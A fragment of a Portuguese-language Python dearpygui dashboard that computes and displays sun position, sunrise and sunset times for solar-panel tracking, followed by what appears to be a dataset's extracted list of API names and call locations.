dpg.add_menu_item( tag = 23_02, label = 'Hora automática', callback = lambda s, d, u : dpg.set_value(HORA_MANUAL, False), shortcut = 'A data e hora de calculo é definida automaticamente de acordo com a hora do controlador local')
dpg.add_menu_item( tag = 23_03, label = 'Hora manual' , callback = lambda s, d, u : dpg.set_value(HORA_MANUAL, True ), shortcut = 'A data e hora de calculo é definida pela entrada do operador no supervisório' )
with dpg.child_window( tag = 23_10):
#Informações gerais do sistema - Automático
dpg.add_text( default_value = 'Hora automática')
dpg.add_drag_floatx( tag = 23_1, label = 'Ano/Mes/Dia Auto' , size = 3, format = '%.0f', speed = 0.1 , min_value = 1 , max_value = 3000 , no_input = True )
dpg.add_drag_floatx( tag = 23_2, label = 'Hora/Min/Sec Auto' , size = 3, format = '%.0f', speed = 0.1 , no_input = True )
dpg.add_drag_int ( tag = 23_3, label = 'Valor no dia' , format = '%.0f' , speed = 0.1 , min_value = 0 , max_value = 26*3600, no_input = True, source = TOT_SECONDS, enabled = False)
dpg.add_drag_int ( tag = 23_4, label = 'Dia Juliano' , format = '%.0f' , speed = 0.1 , min_value = 0 , max_value = 366 , no_input = True, source = JULIANSDAY , enabled = False)
with dpg.child_window( tag = 23_20):
# Informações gerais do sistema - Manual
dpg.add_text( default_value = 'Hora manual')
dpg.add_input_floatx( tag = 23_6, label = 'Ano/Mes/Dia Manual' , size = 3, default_value = [2020, 12, 25], format='%.0f', min_value = 1, max_value = 3000 )
dpg.add_input_floatx( tag = 23_7, label = 'Hora/Min/Sec Manual', size = 3, default_value = [20, 30, 10] , format='%.0f', min_value = 1, max_value = 60 )
dpg.add_drag_int ( tag = 23_8, label = 'Valor no dia' , format = '%.0f', speed = 0.1 , min_value = 0, max_value = 24*3600, no_input = True, source = TOT_SECONDS, enabled = False )
dpg.add_drag_int ( tag = 23_9, label = '<NAME>' , format = '%.0f', speed = 0.1 , min_value = 0, max_value = 366 , no_input = True, source = JULIANSDAY , enabled = False )
dpg.hide_item( 23_20 ) if dpg.get_value(HORA_MANUAL) == False else dpg.hide_item( 2_3_1_0 )
dpg.add_spacer( height = 5 )
with dpg.child_window( tag = 23_30, autosize_x = True, autosize_y = True ):
# Definições de longitude e latitude local
with dpg.child_window ( height = 90 ):
dpg.add_text ( default_value = 'Definições de longitude e latitude local')
dpg.add_input_float( label = 'Latitude' , tag = 2_3_10, min_value = -90, max_value = 90, format = '%3.8f', indent=0.01, source = LATITUDE , callback = lambda sender, data, user : SUN_DATA.set_latitude( data ) )
dpg.add_spacer ( )
dpg.add_input_float( label = 'Longitude', tag = 2_3_11, min_value = -90, max_value = 90, format = '%3.8f', indent=0.01, source = LONGITUDE, callback = lambda sender, data, user : SUN_DATA.set_longitude( data ) )
dpg.add_spacer( height = 5 )
with dpg.child_window( height = 150 ):
# Informações do sol
dpg.add_text ( default_value = 'Informacoes do sol')
dpg.add_drag_float ( label = 'Azimute' , tag = 23_12, format = '%4.2f', speed = 1, no_input = True, source = AZIMUTE )
dpg.add_spacer ( )
dpg.add_drag_float ( label = 'Altitude' , tag = 23_13, format = '%4.2f', speed = 1, no_input = True, source = ZENITE )
dpg.add_spacer ( )
dpg.add_drag_float ( label = 'Elevação (m)' , tag = 23_14, format = '%4.0f', speed = 1, no_input = True, source = ALTITUDE )
dpg.add_spacer ( )
dpg.add_drag_floatx( label = 'Horas de sol' , tag = 23_15, size = 3, format = '%.0f', no_input = True )
dpg.add_spacer( height = 5 )
with dpg.child_window( height = 200 ):
# Posições de interesse
dpg.add_text ( default_value = "Posicoes de interesse", )
dpg.add_text ( default_value = 'Nascer do sol (hh/mm/ss)')
dpg.add_drag_floatx( tag = 2_3_16, size = 3, format='%.0f', speed=1, no_input= True, callback = lambda sender, data, user : dpg.set_value( H_SUNRISE , data.extend([0])) )
dpg.add_spacer ( )
dpg.add_text ( default_value = 'Culminante (hh/mm/ss)' )
dpg.add_drag_floatx( tag = 2_3_17, size = 3, format='%.0f', speed=1, no_input= True, callback = lambda sender, data, user : dpg.set_value( H_SUNSET , data.extend([0])) )
dpg.add_spacer ( )
dpg.add_text ( default_value = 'Por do sol (hh/mm/ss)' )
dpg.add_drag_floatx( tag = 2_3_18, size = 3, format='%.0f', speed=1, no_input= True, callback = lambda sender, data, user : dpg.set_value( H_CULMINANT, data.extend([0])) )
dpg.hide_item( 21_0 )
dpg.hide_item( 22_0 )
dpg.hide_item( 23_0 )
def resize_visualizacaoGeral( ):
# get the main_window dimension
w , h = dpg.get_item_width( 'mainWindow' ), dpg.get_item_height( 'mainWindow' )
dpg.configure_item( 21_0 , width = w*2/3 , height = h*3/5 , pos = [10 , 25 ] ) # DRAWING
dpg.configure_item( 22_0 , width = w*2/3 , height = (h*2/5)-35 , pos = [10 , (h*3/5)+30 ] ) # SUNPATH
dpg.configure_item( 23_0 , width = w/3 -20 , height = h - 30 , pos = [ w*2/3 +15, 25 ] ) # LOG
# get the child_window_window dimension
w1, h1 = dpg.get_item_width( 21_0 ), dpg.get_item_height( 21_0 )
dpg.configure_item( 21_10 , width = w1-20 , height = h1-50 ) # DRAWLIST
update_sun_trajetory( draw_id = 2_1_1_0 , parent_id = 2_1_0 ) # DRAWING
# SUNPATH ATT CHILD_WINDOW
dpg.configure_item( 22_10 , width = (w/3)-15 , height = (h*2/5)*0.8 , pos = [ 5 , 20 ] ) # GIRO
dpg.configure_item( 22_20 , width = (w/3)-15 , height = (h*2/5)*0.8 , pos = [ (w*2/3)//2 +5, 20 ] ) # ELEVAÇÃO
def render_visualizacaoGeral( ):
global TOT_SECONDS , JULIANSDAY, HORA_MANUAL
global HOUR, MINUTE, SECOND
global YEAR, MONTH , DAY
# Horário automático
if dpg.get_value( HORA_MANUAL ) == False :
SUN_DATA.update_date()
dpg.set_value( 23_1, value = [ dpg.get_value(YEAR), dpg.get_value(MONTH) , dpg.get_value(DAY) ] ) # DIA ATUTOMÁTICO
dpg.set_value( 23_2, value = [ dpg.get_value(HOUR), dpg.get_value(MINUTE), dpg.get_value(SECOND)] ) # HORA AUTOMÁTICA
dpg.hide_item( 23_2_0 )
dpg.show_item( 23_1_0 )
# Horário manual
else:
yearm, monthm, daym = dpg.get_value( 23_6 )[:-1]
hourm, minutem, secondm = dpg.get_value( 23_7 )[:-1]
try:
data = dt.datetime( int(yearm), int(monthm), int(daym), int(hourm), int(minutem), int(secondm) )
dt.datetime.timestamp( data )
SUN_DATA.set_date( data )
SUN_DATA.update()
dpg.set_value(YEAR , yearm )
dpg.set_value(MONTH , monthm )
dpg.set_value(DAY , daym )
dpg.set_value(HOUR , hourm )
dpg.set_value(MINUTE, minutem)
dpg.set_value(SECOND, secondm)
except:
pass
# Total de segundos no dia
dpg.set_value( 23_9, SUN_DATA.dia_juliano ) # DIA JULIANO
dpg.set_value( 23_8, SUN_DATA.total_seconds) # TOTAL DE SEGUNDOS
dpg.hide_item( 23_1_0 )
dpg.show_item( 23_2_0 )
# Setar o Azimute, Altitude e Elevação
dpg.set_value( 23_12, math.degrees( SUN_DATA.azi) ) # AZIMUTE
dpg.set_value( 23_13, math.degrees( SUN_DATA.alt) ) # ALTITUDE
dpg.set_value( 23_14, SUN_DATA.altitude ) # ELEVAÇÃO
# Seta as horas do sol calculando as horas minutos e segundos de segundos totais
diff_sunlight = (SUN_DATA.sunset - SUN_DATA.rising).seconds
dpg.set_value( 2_3_15, [diff_sunlight//3600, (diff_sunlight//60)%60 , diff_sunlight%60 ] )
# Setar as informações de Nascer do sol, Culminante (ponto mais alto) e Por do sol
dpg.set_value( 23_16, [ SUN_DATA.rising.hour+SUN_DATA.utc_local , SUN_DATA.rising.minute , SUN_DATA.rising.second ] ) # 'Nascer do sol'
dpg.set_value( 23_17, [ SUN_DATA.transit.hour+SUN_DATA.utc_local, SUN_DATA.transit.minute, SUN_DATA.transit.second ] ) # 'Culminante'
dpg.set_value( 23_18, [ SUN_DATA.sunset.hour+SUN_DATA.utc_local , SUN_DATA.sunset.minute , SUN_DATA.sunset.second ] ) # 'Por do sol'
update_sun_trajetory( draw_id = 21_1_0 , parent_id = 21_0 )
att_sunpos_graphs() | [
"dearpygui.dearpygui.set_axis_limits",
"dearpygui.dearpygui.set_axis_limits_auto",
"math.cos",
"dearpygui.dearpygui.window",
"dearpygui.dearpygui.add_drag_floatx",
"dearpygui.dearpygui.menu_bar",
"dearpygui.dearpygui.hide_item",
"dearpygui.dearpygui.add_drag_float",
"dearpygui.dearpygui.add_drawlist... | [((5563, 5661), 'dearpygui.dearpygui.configure_item', 'dpg.configure_item', (['(id_link + 1)'], {'p1': '[center[0] - r, center[1]]', 'p2': '[center[0] + r, center[1]]'}), '(id_link + 1, p1=[center[0] - r, center[1]], p2=[center[0\n ] + r, center[1]])\n', (5581, 5661), True, 'import dearpygui.dearpygui as dpg\n'), ((6042, 6098), 'dearpygui.dearpygui.configure_item', 'dpg.configure_item', (['(id_link + 4)'], {'center': 'center', 'radius': 'r'}), '(id_link + 4, center=center, radius=r)\n', (6060, 6098), True, 'import dearpygui.dearpygui as dpg\n'), ((6133, 6189), 'dearpygui.dearpygui.configure_item', 'dpg.configure_item', (['(id_link + 5)'], {'center': 'center', 'radius': '(3)'}), '(id_link + 5, center=center, radius=3)\n', (6151, 6189), True, 'import dearpygui.dearpygui as dpg\n'), ((6224, 6299), 'dearpygui.dearpygui.configure_item', 'dpg.configure_item', (['(id_link + 6)'], {'pos': '[center[0] - (r + 20), center[1] - 10]'}), '(id_link + 6, pos=[center[0] - (r + 20), center[1] - 10])\n', (6242, 6299), True, 'import dearpygui.dearpygui as dpg\n'), ((6315, 6389), 'dearpygui.dearpygui.configure_item', 'dpg.configure_item', (['(id_link + 7)'], {'pos': '[center[0] + (r + 5), center[1] - 10]'}), '(id_link + 7, pos=[center[0] + (r + 5), center[1] - 10])\n', (6333, 6389), True, 'import dearpygui.dearpygui as dpg\n'), ((6406, 6481), 'dearpygui.dearpygui.configure_item', 'dpg.configure_item', (['(id_link + 8)'], {'pos': '[center[0] - 10, center[1] - (r + 25)]'}), '(id_link + 8, pos=[center[0] - 10, center[1] - (r + 25)])\n', (6424, 6481), True, 'import dearpygui.dearpygui as dpg\n'), ((6497, 6541), 'dearpygui.dearpygui.configure_item', 'dpg.configure_item', (['(id_link + 9)'], {'points': 'dots'}), '(id_link + 9, points=dots)\n', (6515, 6541), True, 'import dearpygui.dearpygui as dpg\n'), ((6588, 6639), 'dearpygui.dearpygui.configure_item', 'dpg.configure_item', (['(id_link + 10)'], {'p1': 'center', 'p2': 'sun'}), '(id_link + 10, p1=center, p2=sun)\n', (6606, 6639), True, 'import dearpygui.dearpygui as dpg\n'), ((6679, 6723), 'dearpygui.dearpygui.configure_item', 'dpg.configure_item', (['(id_link + 11)'], {'center': 'sun'}), '(id_link + 11, center=sun)\n', (6697, 6723), True, 'import dearpygui.dearpygui as dpg\n'), ((7798, 7836), 'dearpygui.dearpygui.configure_item', 'dpg.configure_item', (['(2213)'], {'x': 'PTI', 'y': 'AZI'}), '(2213, x=PTI, y=AZI)\n', (7816, 7836), True, 'import dearpygui.dearpygui as dpg\n'), ((7864, 7908), 'dearpygui.dearpygui.configure_item', 'dpg.configure_item', (['(2214)'], {'x': 'time_scrt', 'y': 'azi'}), '(2214, x=time_scrt, y=azi)\n', (7882, 7908), True, 'import dearpygui.dearpygui as dpg\n'), ((7926, 7978), 'dearpygui.dearpygui.set_axis_limits', 'dpg.set_axis_limits', (['(2211)'], {'ymin': 'PTI[0]', 'ymax': 'PTI[-1]'}), '(2211, ymin=PTI[0], ymax=PTI[-1])\n', (7945, 7978), True, 'import dearpygui.dearpygui as dpg\n'), ((7992, 8030), 'dearpygui.dearpygui.configure_item', 'dpg.configure_item', (['(2223)'], {'x': 'PTI', 'y': 'ALT'}), '(2223, x=PTI, y=ALT)\n', (8010, 8030), True, 'import dearpygui.dearpygui as dpg\n'), ((8058, 8102), 'dearpygui.dearpygui.configure_item', 'dpg.configure_item', (['(2224)'], {'x': 'time_scrt', 'y': 'alt'}), '(2224, x=time_scrt, y=alt)\n', (8076, 8102), True, 'import dearpygui.dearpygui as dpg\n'), ((8120, 8172), 'dearpygui.dearpygui.set_axis_limits', 'dpg.set_axis_limits', (['(2221)'], {'ymin': 'PTI[0]', 'ymax': 'PTI[-1]'}), '(2221, ymin=PTI[0], ymax=PTI[-1])\n', (8139, 8172), True, 'import dearpygui.dearpygui as dpg\n'), ((16628, 16646), 'dearpygui.dearpygui.hide_item', 'dpg.hide_item', (['(210)'], {}), '(210)\n', (16641, 16646), True, 'import dearpygui.dearpygui as dpg\n'), ((16654, 16672), 'dearpygui.dearpygui.hide_item', 'dpg.hide_item', (['(220)'], {}), '(220)\n', (16667, 16672), True, 'import dearpygui.dearpygui as dpg\n'), ((16680, 16698), 'dearpygui.dearpygui.hide_item', 'dpg.hide_item', (['(230)'], {}), '(230)\n', (16693, 16698), True, 'import dearpygui.dearpygui as dpg\n'), ((16868, 16940), 'dearpygui.dearpygui.configure_item', 'dpg.configure_item', (['(210)'], {'width': '(w * 2 / 3)', 'height': '(h * 3 / 5)', 'pos': '[10, 25]'}), '(210, width=w * 2 / 3, height=h * 3 / 5, pos=[10, 25])\n', (16886, 16940), True, 'import dearpygui.dearpygui as dpg\n'), ((16990, 17083), 'dearpygui.dearpygui.configure_item', 'dpg.configure_item', (['(220)'], {'width': '(w * 2 / 3)', 'height': '(h * 2 / 5 - 35)', 'pos': '[10, h * 3 / 5 + 30]'}), '(220, width=w * 2 / 3, height=h * 2 / 5 - 35, pos=[10, h *\n 3 / 5 + 30])\n', (17008, 17083), True, 'import dearpygui.dearpygui as dpg\n'), ((17111, 17198), 'dearpygui.dearpygui.configure_item', 'dpg.configure_item', (['(230)'], {'width': '(w / 3 - 20)', 'height': '(h - 30)', 'pos': '[w * 2 / 3 + 15, 25]'}), '(230, width=w / 3 - 20, height=h - 30, pos=[w * 2 / 3 + \n 15, 25])\n', (17129, 17198), True, 'import dearpygui.dearpygui as dpg\n'), ((17349, 17404), 'dearpygui.dearpygui.configure_item', 'dpg.configure_item', (['(2110)'], {'width': '(w1 - 20)', 'height': '(h1 - 50)'}), '(2110, width=w1 - 20, height=h1 - 50)\n', (17367, 17404), True, 'import dearpygui.dearpygui as dpg\n'), ((17630, 17709), 'dearpygui.dearpygui.configure_item', 'dpg.configure_item', (['(2210)'], {'width': '(w / 3 - 15)', 'height': '(h * 2 / 5 * 0.8)', 'pos': '[5, 20]'}), '(2210, width=w / 3 - 15, height=h * 2 / 5 * 0.8, pos=[5, 20])\n', (17648, 17709), True, 'import dearpygui.dearpygui as dpg\n'), ((17751, 17851), 'dearpygui.dearpygui.configure_item', 'dpg.configure_item', (['(2220)'], {'width': '(w / 3 - 15)', 'height': '(h * 2 / 5 * 0.8)', 'pos': '[w * 2 / 3 // 2 + 5, 20]'}), '(2220, width=w / 3 - 15, height=h * 2 / 5 * 0.8, pos=[w *\n 2 / 3 // 2 + 5, 20])\n', (17769, 17851), True, 'import dearpygui.dearpygui as dpg\n'), ((19714, 19752), 'dearpygui.dearpygui.set_value', 'dpg.set_value', (['(2314)', 'SUN_DATA.altitude'], {}), '(2314, SUN_DATA.altitude)\n', (19727, 19752), True, 'import dearpygui.dearpygui as dpg\n'), ((19960, 20055), 'dearpygui.dearpygui.set_value', 'dpg.set_value', (['(2315)', '[diff_sunlight // 3600, diff_sunlight // 60 % 60, diff_sunlight % 60]'], {}), '(2315, [diff_sunlight // 3600, diff_sunlight // 60 % 60, \n diff_sunlight % 60])\n', (19973, 20055), True, 'import dearpygui.dearpygui as dpg\n'), ((20143, 20260), 'dearpygui.dearpygui.set_value', 'dpg.set_value', (['(2316)', '[SUN_DATA.rising.hour + SUN_DATA.utc_local, SUN_DATA.rising.minute,\n SUN_DATA.rising.second]'], {}), '(2316, [SUN_DATA.rising.hour + SUN_DATA.utc_local, SUN_DATA.\n rising.minute, SUN_DATA.rising.second])\n', (20156, 20260), True, 'import dearpygui.dearpygui as dpg\n'), ((20284, 20404), 'dearpygui.dearpygui.set_value', 'dpg.set_value', (['(2317)', '[SUN_DATA.transit.hour + SUN_DATA.utc_local, SUN_DATA.transit.minute,\n SUN_DATA.transit.second]'], {}), '(2317, [SUN_DATA.transit.hour + SUN_DATA.utc_local, SUN_DATA.\n transit.minute, SUN_DATA.transit.second])\n', (20297, 20404), True, 'import dearpygui.dearpygui as dpg\n'), ((20425, 20542), 'dearpygui.dearpygui.set_value', 'dpg.set_value', (['(2318)', '[SUN_DATA.sunset.hour + SUN_DATA.utc_local, SUN_DATA.sunset.minute,\n SUN_DATA.sunset.second]'], {}), '(2318, [SUN_DATA.sunset.hour + SUN_DATA.utc_local, SUN_DATA.\n sunset.minute, SUN_DATA.sunset.second])\n', (20438, 20542), True, 'import dearpygui.dearpygui as dpg\n'), ((809, 836), 'dearpygui.dearpygui.get_item_width', 'dpg.get_item_width', (['draw_id'], {}), '(draw_id)\n', (827, 836), True, 'import dearpygui.dearpygui as dpg\n'), ((840, 868), 'dearpygui.dearpygui.get_item_height', 'dpg.get_item_height', (['draw_id'], {}), '(draw_id)\n', (859, 868), True, 'import dearpygui.dearpygui as dpg\n'), ((3967, 4086), 'dearpygui.dearpygui.draw_circle', 'dpg.draw_circle', ([], {'parent': 'draw_id', 'tag': '(id_link + (12 + n))', 'center': 'p', 'radius': '(2)', 'color': '[n * 4, 255 - n * 2, n * 2, 255]'}), '(parent=draw_id, tag=id_link + (12 + n), center=p, radius=2,\n color=[n * 4, 255 - n * 2, n * 2, 255])\n', (3982, 4086), True, 'import dearpygui.dearpygui as dpg\n'), ((4577, 4604), 'dearpygui.dearpygui.get_item_width', 'dpg.get_item_width', (['draw_id'], {}), '(draw_id)\n', (4595, 4604), True, 'import dearpygui.dearpygui as dpg\n'), ((4608, 4636), 'dearpygui.dearpygui.get_item_height', 'dpg.get_item_height', (['draw_id'], {}), '(draw_id)\n', (4627, 4636), True, 'import dearpygui.dearpygui as dpg\n'), ((4659, 4691), 'dearpygui.dearpygui.get_item_width', 'dpg.get_item_width', (['"""mainWindow"""'], {}), "('mainWindow')\n", (4677, 4691), True, 'import dearpygui.dearpygui as dpg\n'), ((4696, 4729), 'dearpygui.dearpygui.get_item_height', 'dpg.get_item_height', (['"""mainWindow"""'], {}), "('mainWindow')\n", (4715, 4729), True, 'import dearpygui.dearpygui as dpg\n'), ((6807, 6855), 'dearpygui.dearpygui.configure_item', 'dpg.configure_item', (['(id_link + (12 + n))'], {'center': 'p'}), '(id_link + (12 + n), center=p)\n', (6825, 6855), True, 'import dearpygui.dearpygui as dpg\n'), ((6925, 6951), 'dearpygui.dearpygui.get_value', 'dpg.get_value', (['HORA_MANUAL'], {}), '(HORA_MANUAL)\n', (6938, 6951), True, 'import dearpygui.dearpygui as dpg\n'), ((8279, 8449), 'dearpygui.dearpygui.window', 'dpg.window', ([], {'label': '"""Posição solar"""', 'tag': '(210)', 'pos': '[50, 50]', 'width': '(500)', 'height': '(500)', 'no_move': '(True)', 'no_resize': '(True)', 'no_collapse': '(True)', 'no_close': '(True)', 'no_title_bar': '(True)'}), "(label='Posição solar', tag=210, pos=[50, 50], width=500, height=\n 500, no_move=True, no_resize=True, no_collapse=True, no_close=True,\n no_title_bar=True)\n", (8289, 8449), True, 'import dearpygui.dearpygui as dpg\n'), ((8639, 8709), 'dearpygui.dearpygui.add_drawlist', 'dpg.add_drawlist', ([], {'tag': '(2110)', 'width': '(w - 20)', 'height': '(h - 50)', 'label': '"""Solar"""'}), "(tag=2110, width=w - 20, height=h - 50, label='Solar')\n", (8655, 8709), True, 'import dearpygui.dearpygui as dpg\n'), ((8877, 8980), 'dearpygui.dearpygui.window', 'dpg.window', ([], {'label': '"""Atuação"""', 'tag': '(220)', 'no_move': '(True)', 'no_resize': '(True)', 'no_collapse': '(True)', 'no_close': '(True)'}), "(label='Atuação', tag=220, no_move=True, no_resize=True,\n no_collapse=True, no_close=True)\n", (8887, 8980), True, 'import dearpygui.dearpygui as dpg\n'), ((9085, 9150), 'dearpygui.dearpygui.add_text', 'dpg.add_text', (['"""Área para a atução da posição dos paineis solares"""'], {}), "('Área para a atução da posição dos paineis solares')\n", (9097, 9150), True, 'import dearpygui.dearpygui as dpg\n'), ((10806, 10934), 'dearpygui.dearpygui.window', 'dpg.window', ([], {'label': '"""Painel de log"""', 'tag': '(230)', 'no_move': '(True)', 'no_resize': '(True)', 'no_collapse': '(True)', 'no_close': '(True)', 'no_title_bar': '(True)'}), "(label='Painel de log', tag=230, no_move=True, no_resize=True,\n no_collapse=True, no_close=True, no_title_bar=True)\n", (10816, 10934), True, 'import dearpygui.dearpygui as dpg\n'), ((11050, 11109), 'dearpygui.dearpygui.add_text', 'dpg.add_text', ([], {'default_value': '"""Informações gerais do sistema"""'}), "(default_value='Informações gerais do sistema')\n", (11062, 11109), True, 'import dearpygui.dearpygui as dpg\n'), ((13821, 13845), 'dearpygui.dearpygui.add_spacer', 'dpg.add_spacer', ([], {'height': '(5)'}), '(height=5)\n', (13835, 13845), True, 'import dearpygui.dearpygui as dpg\n'), ((16786, 16818), 'dearpygui.dearpygui.get_item_width', 'dpg.get_item_width', (['"""mainWindow"""'], {}), "('mainWindow')\n", (16804, 16818), True, 'import dearpygui.dearpygui as dpg\n'), ((16822, 16855), 'dearpygui.dearpygui.get_item_height', 'dpg.get_item_height', (['"""mainWindow"""'], {}), "('mainWindow')\n", (16841, 16855), True, 'import dearpygui.dearpygui as dpg\n'), ((17288, 17311), 'dearpygui.dearpygui.get_item_width', 'dpg.get_item_width', (['(210)'], {}), '(210)\n', (17306, 17311), True, 'import dearpygui.dearpygui as dpg\n'), ((17316, 17340), 'dearpygui.dearpygui.get_item_height', 'dpg.get_item_height', (['(210)'], {}), '(210)\n', (17335, 17340), True, 'import dearpygui.dearpygui as dpg\n'), ((18051, 18077), 'dearpygui.dearpygui.get_value', 'dpg.get_value', (['HORA_MANUAL'], {}), '(HORA_MANUAL)\n', (18064, 18077), True, 'import dearpygui.dearpygui as dpg\n'), ((18385, 18404), 'dearpygui.dearpygui.hide_item', 'dpg.hide_item', (['(2320)'], {}), '(2320)\n', (18398, 18404), True, 'import dearpygui.dearpygui as dpg\n'), ((18417, 18436), 'dearpygui.dearpygui.show_item', 'dpg.show_item', (['(2310)'], {}), '(2310)\n', (18430, 18436), True, 'import dearpygui.dearpygui as dpg\n'), ((19173, 19213), 'dearpygui.dearpygui.set_value', 'dpg.set_value', (['(239)', 'SUN_DATA.dia_juliano'], {}), '(239, SUN_DATA.dia_juliano)\n', (19186, 19213), True, 'import dearpygui.dearpygui as dpg\n'), ((19270, 19312), 'dearpygui.dearpygui.set_value', 'dpg.set_value', (['(238)', 'SUN_DATA.total_seconds'], {}), '(238, SUN_DATA.total_seconds)\n', (19283, 19312), True, 'import dearpygui.dearpygui as dpg\n'), ((19383, 19402), 'dearpygui.dearpygui.hide_item', 'dpg.hide_item', (['(2310)'], {}), '(2310)\n', (19396, 19402), True, 'import dearpygui.dearpygui as dpg\n'), ((19415, 19434), 'dearpygui.dearpygui.show_item', 'dpg.show_item', (['(2320)'], {}), '(2320)\n', (19428, 19434), True, 'import dearpygui.dearpygui as dpg\n'), ((19517, 19543), 'math.degrees', 'math.degrees', (['SUN_DATA.azi'], {}), '(SUN_DATA.azi)\n', (19529, 19543), False, 'import math\n'), ((19626, 19652), 'math.degrees', 'math.degrees', (['SUN_DATA.alt'], {}), '(SUN_DATA.alt)\n', (19638, 19652), False, 'import math\n'), ((6974, 6994), 'datetime.datetime.utcnow', 'dt.datetime.utcnow', ([], {}), '()\n', (6992, 6994), True, 'import datetime as dt\n'), ((7628, 7654), 'math.degrees', 'math.degrees', (['SUN_DATA.azi'], {}), '(SUN_DATA.azi)\n', (7640, 7654), False, 'import math\n'), ((7658, 7684), 'math.degrees', 'math.degrees', (['SUN_DATA.alt'], {}), '(SUN_DATA.alt)\n', (7670, 7684), False, 'import math\n'), ((7716, 7748), 'datetime.datetime.timestamp', 'dt.datetime.timestamp', (['last_date'], {}), '(last_date)\n', (7737, 7748), True, 'import datetime as dt\n'), ((8577, 8600), 'dearpygui.dearpygui.get_item_width', 'dpg.get_item_width', (['(210)'], {}), '(210)\n', (8595, 8600), True, 'import dearpygui.dearpygui as dpg\n'), ((8604, 8628), 'dearpygui.dearpygui.get_item_height', 'dpg.get_item_height', (['(210)'], {}), '(210)\n', (8623, 8628), True, 'import dearpygui.dearpygui as dpg\n'), ((9164, 9190), 'dearpygui.dearpygui.group', 'dpg.group', ([], {'horizontal': '(True)'}), '(horizontal=True)\n', (9173, 9190), True, 'import dearpygui.dearpygui as dpg\n'), ((11135, 11204), 'dearpygui.dearpygui.child_window', 'dpg.child_window', ([], {'tag': '(2300)', 'autosize_x': '(True)', 'height': '(170)', 'menubar': '(True)'}), '(tag=2300, autosize_x=True, height=170, menubar=True)\n', (11151, 11204), True, 'import dearpygui.dearpygui as dpg\n'), ((13863, 13923), 'dearpygui.dearpygui.child_window', 'dpg.child_window', ([], {'tag': '(2330)', 'autosize_x': '(True)', 'autosize_y': '(True)'}), '(tag=2330, autosize_x=True, autosize_y=True)\n', (13879, 13923), True, 'import dearpygui.dearpygui as dpg\n'), ((14658, 14682), 'dearpygui.dearpygui.add_spacer', 'dpg.add_spacer', ([], {'height': '(5)'}), '(height=5)\n', (14672, 14682), True, 'import dearpygui.dearpygui as dpg\n'), ((15535, 15559), 'dearpygui.dearpygui.add_spacer', 'dpg.add_spacer', ([], {'height': '(5)'}), '(height=5)\n', (15549, 15559), True, 'import dearpygui.dearpygui as dpg\n'), ((18516, 18534), 'dearpygui.dearpygui.get_value', 'dpg.get_value', (['(236)'], {}), '(236)\n', (18529, 18534), True, 'import dearpygui.dearpygui as dpg\n'), ((18577, 18595), 'dearpygui.dearpygui.get_value', 'dpg.get_value', (['(237)'], {}), '(237)\n', (18590, 18595), True, 'import dearpygui.dearpygui as dpg\n'), ((18738, 18765), 'datetime.datetime.timestamp', 'dt.datetime.timestamp', (['data'], {}), '(data)\n', (18759, 18765), True, 'import datetime as dt\n'), ((18848, 18874), 'dearpygui.dearpygui.set_value', 'dpg.set_value', (['YEAR', 'yearm'], {}), '(YEAR, yearm)\n', (18861, 18874), True, 'import dearpygui.dearpygui as dpg\n'), ((18891, 18919), 'dearpygui.dearpygui.set_value', 'dpg.set_value', (['MONTH', 'monthm'], {}), '(MONTH, monthm)\n', (18904, 18919), True, 'import dearpygui.dearpygui as dpg\n'), ((18934, 18958), 'dearpygui.dearpygui.set_value', 'dpg.set_value', (['DAY', 'daym'], {}), '(DAY, daym)\n', (18947, 18958), True, 'import dearpygui.dearpygui as dpg\n'), ((18978, 19004), 'dearpygui.dearpygui.set_value', 'dpg.set_value', (['HOUR', 'hourm'], {}), '(HOUR, hourm)\n', (18991, 19004), True, 'import dearpygui.dearpygui as dpg\n'), ((19021, 19051), 'dearpygui.dearpygui.set_value', 'dpg.set_value', (['MINUTE', 'minutem'], {}), '(MINUTE, minutem)\n', (19034, 19051), True, 'import dearpygui.dearpygui as dpg\n'), ((19064, 19094), 'dearpygui.dearpygui.set_value', 'dpg.set_value', (['SECOND', 'secondm'], {}), '(SECOND, secondm)\n', (19077, 19094), True, 'import dearpygui.dearpygui as dpg\n'), ((1638, 1654), 'math.cos', 'math.cos', (['sun[0]'], {}), '(sun[0])\n', (1646, 1654), False, 'import math\n'), ((5461, 5477), 'math.cos', 'math.cos', (['sun[0]'], {}), '(sun[0])\n', (5469, 5477), False, 'import math\n'), ((7072, 7091), 'dearpygui.dearpygui.get_value', 'dpg.get_value', (['YEAR'], {}), '(YEAR)\n', (7085, 7091), True, 'import dearpygui.dearpygui as dpg\n'), ((7093, 7113), 'dearpygui.dearpygui.get_value', 'dpg.get_value', (['MONTH'], {}), '(MONTH)\n', (7106, 7113), True, 'import dearpygui.dearpygui as dpg\n'), ((7115, 7133), 'dearpygui.dearpygui.get_value', 'dpg.get_value', (['DAY'], {}), '(DAY)\n', (7128, 7133), True, 'import dearpygui.dearpygui as dpg\n'), ((7135, 7154), 'dearpygui.dearpygui.get_value', 'dpg.get_value', (['HOUR'], {}), '(HOUR)\n', (7148, 7154), True, 'import dearpygui.dearpygui as dpg\n'), ((7156, 7177), 'dearpygui.dearpygui.get_value', 'dpg.get_value', (['MINUTE'], {}), '(MINUTE)\n', (7169, 7177), True, 'import dearpygui.dearpygui as dpg\n'), ((7179, 7200), 'dearpygui.dearpygui.get_value', 'dpg.get_value', (['SECOND'], {}), '(SECOND)\n', (7192, 7200), True, 'import dearpygui.dearpygui as dpg\n'), ((7403, 7430), 'math.degrees', 'math.degrees', (['(azi - math.pi)'], {}), '(azi - math.pi)\n', (7415, 7430), False, 'import math\n'), ((7453, 7480), 'math.degrees', 'math.degrees', (['(azi + math.pi)'], {}), '(azi + math.pi)\n', (7465, 7480), False, 'import math\n'), ((7503, 7520), 'math.degrees', 'math.degrees', (['alt'], {}), '(alt)\n', (7515, 7520), False, 'import math\n'), ((7573, 7599), 'datetime.datetime.timestamp', 'dt.datetime.timestamp', (['tim'], {}), '(tim)\n', (7594, 7599), True, 'import datetime as dt\n'), ((9214, 9302), 'dearpygui.dearpygui.plot', 'dpg.plot', ([], {'tag': '(2210)', 'label': '"""Azimute do dia"""', 'height': '(312)', 'width': '(478)', 'anti_aliased': '(True)'}), "(tag=2210, label='Azimute do dia', height=312, width=478,\n anti_aliased=True)\n", (9222, 9302), True, 'import dearpygui.dearpygui as dpg\n'), ((9332, 9353), 'dearpygui.dearpygui.add_plot_legend', 'dpg.add_plot_legend', ([], {}), '()\n', (9351, 9353), True, 'import dearpygui.dearpygui as dpg\n'), ((9370, 9477), 'dearpygui.dearpygui.add_plot_axis', 'dpg.add_plot_axis', 